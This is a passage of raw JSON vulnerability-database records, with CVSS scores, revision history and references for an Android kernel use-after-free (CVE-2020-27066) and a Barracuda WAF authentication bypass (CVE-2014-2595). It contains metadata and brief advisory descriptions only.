"2021-07-22T08:54:32", "rev": 2, "value": 6.4, "vector": "NONE"}, "twitter": {"counter": 2, "modified": "2020-12-16T17:49:22", "tweets": [{"link": "https://twitter.com/www_sesin_at/status/1339462989037137921", "text": "New post from https://t.co/9KYxtdZjkl?amp=1 (CVE-2020-27066 (android)) has been published on https://t.co/EALrcIKTmT?amp=1"}, {"link": "https://twitter.com/WolfgangSesin/status/1339463049674186752", "text": "New post from https://t.co/uXvPWJy6tj?amp=1 (CVE-2020-27066 (android)) has been published on https://t.co/2wwZKNJbFR?amp=1"}]}}, "extraReferences": [{"name": "https://source.android.com/security/bulletin/pixel/2020-12-01", "refsource": "MISC", "tags": ["Patch", "Vendor Advisory"], "url": "https://source.android.com/security/bulletin/pixel/2020-12-01"}], "hash": "30d9d72e5515a2a7e49d2242ab6929b7c94d87d7942d7d9f89dc8fda5a0cd535", "hashmap": [{"hash": "f1e904fa0373499fda428d90eebfb21d", "key": "reporter"}, {"hash": "8aebd2ba46c74298d7bb0dd15b35639f", "key": "extraReferences"}, {"hash": "8deec174a952bd595eabdefd2eea839c", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "6e8bd440f4fb55ae63bba09dfc27a808", "key": "cwe"}, {"hash": "4e19edaff9d65a836fa3b1c95015bf46", "key": "references"}, {"hash": "2d1ac5022c4f9a85e7eabd973ed53781", "key": "title"}, {"hash": "455a0fe19695409c917838c86dd8a67d", "key": "cpe23"}, {"hash": "76b16b96b47bcc7358b26f2b97e3924d", "key": "cpe"}, {"hash": "ecb3a5cc08756774f67974fbee71fec8", "key": "description"}, {"hash": "80e7882a30277a24bc8cfe4240c76dca", "key": "cvelist"}, {"hash": "fab3ed7cc7f93696c67f7fa2360d4b1a", "key": "affectedSoftware"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "8ee1fc0287b899f61c2e8e573233ef06", "key": "href"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "45f6d1c174d2b45f4428222ab35b401a", "key": "cpeConfiguration"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "23d773d8ec2bff69ab6442c5c7510dc5", "key": "published"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}, {"hash": "183798fce373747341ba2f32f8021ac7", "key": "modified"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-27066", "id": "CVE-2020-27066", "immutableFields": [], "lastseen": "2021-07-22T08:54:32", "modified": "2021-07-21T11:39:00", "objectVersion": "1.5", "published": "2020-12-15T17:15:00", "references": ["https://source.android.com/security/bulletin/pixel/2020-12-01"], "reporter": "security@android.com", "title": "CVE-2020-27066", "type": "cve", "viewCount": 5}, "different_elements": ["cwe"], "edition": 5, "lastseen": "2021-07-22T08:54:32"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "google:android", "name": "google android", "operator": "eq", "version": "-"}], "bulletinFamily": "NVD", "cpe": ["cpe:/o:google:android:-"], "cpe23": ["cpe:2.3:o:google:android:-:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:o:google:android:-:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2020-27066"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.7, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 0.8, "impactScore": 5.9}, "cwe": ["CWE-416"], "description": "In xfrm6_tunnel_free_spi of net/ipv6/xfrm6_tunnel.c, there is a possible use after free due to improper locking. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-168043318", "edition": 2, "enchantments": {"dependencies": {"modified": "2020-12-17T13:48:12", "references": [], "rev": 2}, "score": {"modified": "2020-12-17T13:48:12", "rev": 2, "value": 6.4, "vector": "NONE"}, "twitter": {"counter": 2, "modified": "2020-12-16T17:49:22", "tweets": [{"link": "https://twitter.com/www_sesin_at/status/1339462989037137921", "text": "New post from https://t.co/9KYxtdZjkl?amp=1 (CVE-2020-27066 (android)) has been published on https://t.co/EALrcIKTmT?amp=1"}, {"link": "https://twitter.com/WolfgangSesin/status/1339463049674186752", "text": "New post from https://t.co/uXvPWJy6tj?amp=1 (CVE-2020-27066 (android)) has been published on https://t.co/2wwZKNJbFR?amp=1"}]}}, "extraReferences": [], "hash": "0eb56713dd27badd898b3d955765ca8a8d161717c2fc1db71bff1b96ba576ce0", "hashmap": [{"hash": "4275e05fc9dec0096fb711c238aee426", "key": "modified"}, {"hash": "8deec174a952bd595eabdefd2eea839c", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "6e8bd440f4fb55ae63bba09dfc27a808", "key": "cwe"}, {"hash": "4e19edaff9d65a836fa3b1c95015bf46", "key": "references"}, {"hash": "2d1ac5022c4f9a85e7eabd973ed53781", "key": "title"}, {"hash": "455a0fe19695409c917838c86dd8a67d", "key": "cpe23"}, {"hash": "76b16b96b47bcc7358b26f2b97e3924d", "key": "cpe"}, {"hash": "ecb3a5cc08756774f67974fbee71fec8", "key": "description"}, {"hash": "80e7882a30277a24bc8cfe4240c76dca", "key": "cvelist"}, {"hash": "fab3ed7cc7f93696c67f7fa2360d4b1a", "key": "affectedSoftware"}, {"hash": "ebc89252fcbfd7d9a590240d002f9b82", "key": "cpeConfiguration"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "8ee1fc0287b899f61c2e8e573233ef06", "key": "href"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "23d773d8ec2bff69ab6442c5c7510dc5", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-27066", "id": "CVE-2020-27066", "lastseen": "2020-12-17T13:48:12", "modified": "2020-12-17T02:28:00", "objectVersion": "1.3", "published": "2020-12-15T17:15:00", "references": ["https://source.android.com/security/bulletin/pixel/2020-12-01"], "reporter": "cve@mitre.org", "title": "CVE-2020-27066", "type": "cve", "viewCount": 0}, "differentElements": ["extraReferences"], "edition": 2, "lastseen": "2020-12-17T13:48:12"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "cvelist": ["CVE-2020-27066"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "In xfrm6_tunnel_free_spi of net/ipv6/xfrm6_tunnel.c, there is a possible use after free due to improper locking. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-168043318", "edition": 1, "enchantments": {"dependencies": {"modified": "2020-12-16T17:49:22", "references": [], "rev": 2}, "score": {"modified": "2020-12-16T17:49:22", "rev": 2, "value": 6.4, "vector": "NONE"}, "twitter": {"counter": 4, "modified": "2020-12-16T17:49:22", "tweets": [{"link": "https://twitter.com/www_sesin_at/status/1339462989037137921", "text": "New post from https://t.co/9KYxtdZjkl?amp=1 (CVE-2020-27066 (android)) has been published on https://t.co/EALrcIKTmT?amp=1"}, {"link": "https://twitter.com/www_sesin_at/status/1339462989037137921", "text": "New post from https://t.co/9KYxtdZjkl?amp=1 (CVE-2020-27066 (android)) has been published on https://t.co/EALrcIKTmT?amp=1"}, {"link": "https://twitter.com/WolfgangSesin/status/1339463049674186752", "text": "New post from https://t.co/uXvPWJy6tj?amp=1 (CVE-2020-27066 (android)) has been published on https://t.co/2wwZKNJbFR?amp=1"}, {"link": "https://twitter.com/WolfgangSesin/status/1339463049674186752", "text": "New post from https://t.co/uXvPWJy6tj?amp=1 (CVE-2020-27066 (android)) has been published on https://t.co/2wwZKNJbFR?amp=1"}]}}, "hash": "bd764be469c128e07055509635c28b780c99f3abaf73e8b0cef4299d95f3ec62", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "4e19edaff9d65a836fa3b1c95015bf46", "key": "references"}, {"hash": "2d1ac5022c4f9a85e7eabd973ed53781", "key": "title"}, {"hash": "ecb3a5cc08756774f67974fbee71fec8", "key": "description"}, {"hash": "80e7882a30277a24bc8cfe4240c76dca", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "a090eb40bb2242bd2b78fbe3e6e7fccb", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "8ee1fc0287b899f61c2e8e573233ef06", "key": "href"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "81342635da437da3b0897e10f103e0d6", "key": "cpeConfiguration"}, {"hash": "23d773d8ec2bff69ab6442c5c7510dc5", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-27066", "id": "CVE-2020-27066", "lastseen": "2020-12-16T17:49:22", "modified": "2020-12-15T17:29:00", "objectVersion": "1.3", "published": "2020-12-15T17:15:00", "references": ["https://source.android.com/security/bulletin/pixel/2020-12-01"], "reporter": "cve@mitre.org", "title": "CVE-2020-27066", "type": "cve", "viewCount": 0}, "differentElements": ["cpe23", "cvss", "cvss3", "cvss2", "modified", "cpe", "cwe", "affectedSoftware", "cpeConfiguration"], "edition": 1, "lastseen": "2020-12-16T17:49:22"}], "edition": 6, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "fab3ed7cc7f93696c67f7fa2360d4b1a"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "76b16b96b47bcc7358b26f2b97e3924d"}, {"key": "cpe23", "hash": "455a0fe19695409c917838c86dd8a67d"}, {"key": "cpeConfiguration", "hash": "45f6d1c174d2b45f4428222ab35b401a"}, {"key": "cvelist", "hash": "80e7882a30277a24bc8cfe4240c76dca"}, {"key": "cvss", "hash": "6f6410364e4cee78bd47ed1fc3d8dd5b"}, {"key": "cvss2", "hash": "a6adb76bd2d2e833d4aee455da4b36c3"}, {"key": "cvss3", "hash": "8deec174a952bd595eabdefd2eea839c"}, {"key": "cwe", "hash": "3cb862ac6ef71afba8a0db8f489f2fe0"}, {"key": "description", "hash": "ecb3a5cc08756774f67974fbee71fec8"}, {"key": "extraReferences", "hash": "8aebd2ba46c74298d7bb0dd15b35639f"}, {"key": "href", "hash": "8ee1fc0287b899f61c2e8e573233ef06"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "183798fce373747341ba2f32f8021ac7"}, {"key": "published", "hash": "23d773d8ec2bff69ab6442c5c7510dc5"}, {"key": "references", "hash": "4e19edaff9d65a836fa3b1c95015bf46"}, {"key": "reporter", "hash": "f1e904fa0373499fda428d90eebfb21d"}, {"key": "title", "hash": "2d1ac5022c4f9a85e7eabd973ed53781"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "13ee4d76b3c315f62881cd3ccfe4f878a0090831021e6768606587a7192a5797", "viewCount": 8, "enchantments": {"dependencies": {"references": [{"type": "redhatcve", "idList": ["RH:CVE-2020-27066"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-27066"]}], "modified": "2021-08-04T16:55:14", "rev": 2}, "score": {"value": 6.4, "vector": "NONE", "modified": "2021-08-04T16:55:14", "rev": 2}, "twitter": {"counter": 2, "modified": "2020-12-16T17:49:22", "tweets": [{"link": "https://twitter.com/www_sesin_at/status/1339462989037137921", "text": "New post from https://t.co/9KYxtdZjkl?amp=1 (CVE-2020-27066 (android)) has been published on https://t.co/EALrcIKTmT?amp=1"}, {"link": "https://twitter.com/WolfgangSesin/status/1339463049674186752", "text": "New post from https://t.co/uXvPWJy6tj?amp=1 (CVE-2020-27066 (android)) has been published on https://t.co/2wwZKNJbFR?amp=1"}]}}, "objectVersion": "1.6", "cpe": ["cpe:/o:google:android:-"], "affectedSoftware": [{"cpeName": "google:android", "name": "google android", "operator": "eq", "version": "-"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:o:google:android:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.7, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 0.8, "impactScore": 5.9}, "cpe23": ["cpe:2.3:o:google:android:-:*:*:*:*:*:*:*"], "cwe": ["CWE-416", "CWE-667"], "scheme": null, "extraReferences": [{"name": "https://source.android.com/security/bulletin/pixel/2020-12-01", "refsource": "MISC", "tags": ["Patch", "Vendor Advisory"], "url": "https://source.android.com/security/bulletin/pixel/2020-12-01"}], "immutableFields": []}, {"bulletinFamily": "NVD", "hash": "6a0ace8cdb63863b470e6561269f441d83851201520bc6a55e7930a925c15e3a", "id": "CVE-2014-2595", "lastseen": "2021-04-22T23:44:08", "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "objectVersion": "1.5", "published": "2020-02-12T01:15:00", "cvelist": ["CVE-2014-2595"], "viewCount": 73, "modified": "2020-02-20T15:55:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "edition": 8, "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "history": [{"bulletin": {"affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cvelist": ["CVE-2014-2595"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-02-13T14:29:47", "references": [{"idList": ["PACKETSTORM:127740"], "type": "packetstorm"}, {"idList": ["SECURITYVULNS:DOC:31004", "SECURITYVULNS:VULN:13887"], "type": "securityvulns"}, {"idList": ["EDB-ID:39278"], "type": "exploitdb"}]}, "score": {"modified": "2020-02-13T14:29:47", "value": 6.9, "vector": "NONE"}}, "hash": "0d148bb322c927927cf5c8adaba4daf0d811bf2bee4917f93ca62ca2f942333e", "hashmap": [{"hash": "584cd9e6927eaaa814c6545414f09911", "key": "description"}, {"hash": "cf46dbeffc0c7dc51130bcd388b4459a", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "afd8c4a8002c25596504fc1efc107886", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "23075837e6c728c8f0077b2ae5d5ee7f", "key": "modified"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "published"}, {"hash": "756bd44ad36e62b951b7a08611cbd3f5", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "bc7f8fc71017e1124d57947313af5643", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "id": "CVE-2014-2595", "lastseen": "2020-02-13T14:29:47", "modified": "2020-02-12T13:07:00", "objectVersion": "1.3", "published": "2020-02-12T01:15:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "type": "cve", "viewCount": 28}, "differentElements": ["cpe23", "cvss", "cvss2", "modified", "cpe", "cwe", "affectedSoftware"], "edition": 3, "lastseen": "2020-02-13T14:29:47"}, {"bulletin": {"affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cvelist": ["CVE-2014-2595"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 2, "enchantments": {"dependencies": {"modified": "2020-02-12T14:27:29", "references": [{"idList": ["PACKETSTORM:127740"], "type": "packetstorm"}, {"idList": ["SECURITYVULNS:DOC:31004", "SECURITYVULNS:VULN:13887"], "type": "securityvulns"}, {"idList": ["EDB-ID:39278"], "type": "exploitdb"}]}, "score": {"modified": "2020-02-12T14:27:29", "value": 6.9, "vector": "NONE"}}, "hash": "6ccf8f84237981876cda9914b348e4e11c8972875cdf630f59422732f1ea69ba", "hashmap": [{"hash": "584cd9e6927eaaa814c6545414f09911", "key": "description"}, {"hash": "cf46dbeffc0c7dc51130bcd388b4459a", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "modified"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "afd8c4a8002c25596504fc1efc107886", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "published"}, {"hash": "756bd44ad36e62b951b7a08611cbd3f5", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "bc7f8fc71017e1124d57947313af5643", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "id": "CVE-2014-2595", "lastseen": "2020-02-12T14:27:29", "modified": "2020-02-12T01:15:00", "objectVersion": "1.3", "published": "2020-02-12T01:15:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "type": "cve", "viewCount": 28}, "differentElements": ["modified"], "edition": 2, "lastseen": "2020-02-12T14:27:29"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "barracuda:web_application_firewall", "name": "barracuda web application firewall", "operator": "eq", "version": "7.8.1.013"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2014-2595"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "cwe": ["CWE-613"], "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 6, "enchantments": {"dependencies": {"modified": "2020-10-03T12:01:15", "references": [{"idList": ["PACKETSTORM:127740"], "type": "packetstorm"}, {"idList": ["SECURITYVULNS:DOC:31004", "SECURITYVULNS:VULN:13887"], "type": "securityvulns"}, {"idList": ["EDB-ID:39278"], "type": "exploitdb"}], "rev": 2}, "score": {"modified": "2020-10-03T12:01:15", "rev": 2, "value": 6.9, "vector": "NONE"}}, "extraReferences": [], "hash": "65fabd8c3b92ccbba797b3dfba517234b9e0e8bc2464531f2cd64047dd457870", "hashmap": [{"hash": "584cd9e6927eaaa814c6545414f09911", "key": "description"}, {"hash": "cf46dbeffc0c7dc51130bcd388b4459a", "key": "references"}, {"hash": "92ee34fefd5301ff6ccb77b813c8d4f8", "key": "modified"}, {"hash": "86870277fcb3e3e121fe9e4f1f7c2b51", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "405ecfc0fb244283a2773863614145bf", "key": "cpe23"}, {"hash": "e63509ce8b627fb239a5a63969122026", "key": "cvss2"}, {"hash": "832b9c21b4589969549f63eb0724398c", "key": "cpe"}, {"hash": "0e66a595df2112e69adac8e55cbdb92d", "key": "cpeConfiguration"}, {"hash": "a97b191a26cb922c0b82d26c5f04f4db", "key": "affectedSoftware"}, {"hash": "ad35358d166de03a84a3a9280d95337a", "key": "cvss3"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "afd8c4a8002c25596504fc1efc107886", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "published"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "756bd44ad36e62b951b7a08611cbd3f5", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "bc7f8fc71017e1124d57947313af5643", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "id": "CVE-2014-2595", "lastseen": "2020-10-03T12:01:15", "modified": "2020-02-20T15:55:00", "objectVersion": "1.3", "published": "2020-02-12T01:15:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "type": "cve", "viewCount": 56}, "differentElements": ["extraReferences"], "edition": 6, "lastseen": "2020-10-03T12:01:15"}, {"bulletin": {"affectedSoftware": [{"name": "barracuda web_application_firewall", "operator": "eq", "version": "7.8.1.013"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"], "cvelist": ["CVE-2014-2595"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-613"], "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-02-21T13:06:26", "references": [{"idList": ["PACKETSTORM:127740"], "type": "packetstorm"}, {"idList": ["SECURITYVULNS:DOC:31004", "SECURITYVULNS:VULN:13887"], "type": "securityvulns"}, {"idList": ["EDB-ID:39278"], "type": "exploitdb"}], "rev": 2}, "score": {"modified": "2020-02-21T13:06:26", "rev": 2, "value": 6.9, "vector": "NONE"}}, "hash": "4423bdd8d6936961112ee89e752cf7c866f443470052f4a4ac3529b4be6ae18f", "hashmap": [{"hash": "584cd9e6927eaaa814c6545414f09911", "key": "description"}, {"hash": "cf46dbeffc0c7dc51130bcd388b4459a", "key": "references"}, {"hash": "92ee34fefd5301ff6ccb77b813c8d4f8", "key": "modified"}, {"hash": "86870277fcb3e3e121fe9e4f1f7c2b51", "key": "cwe"}, {"hash": "405ecfc0fb244283a2773863614145bf", "key": "cpe23"}, 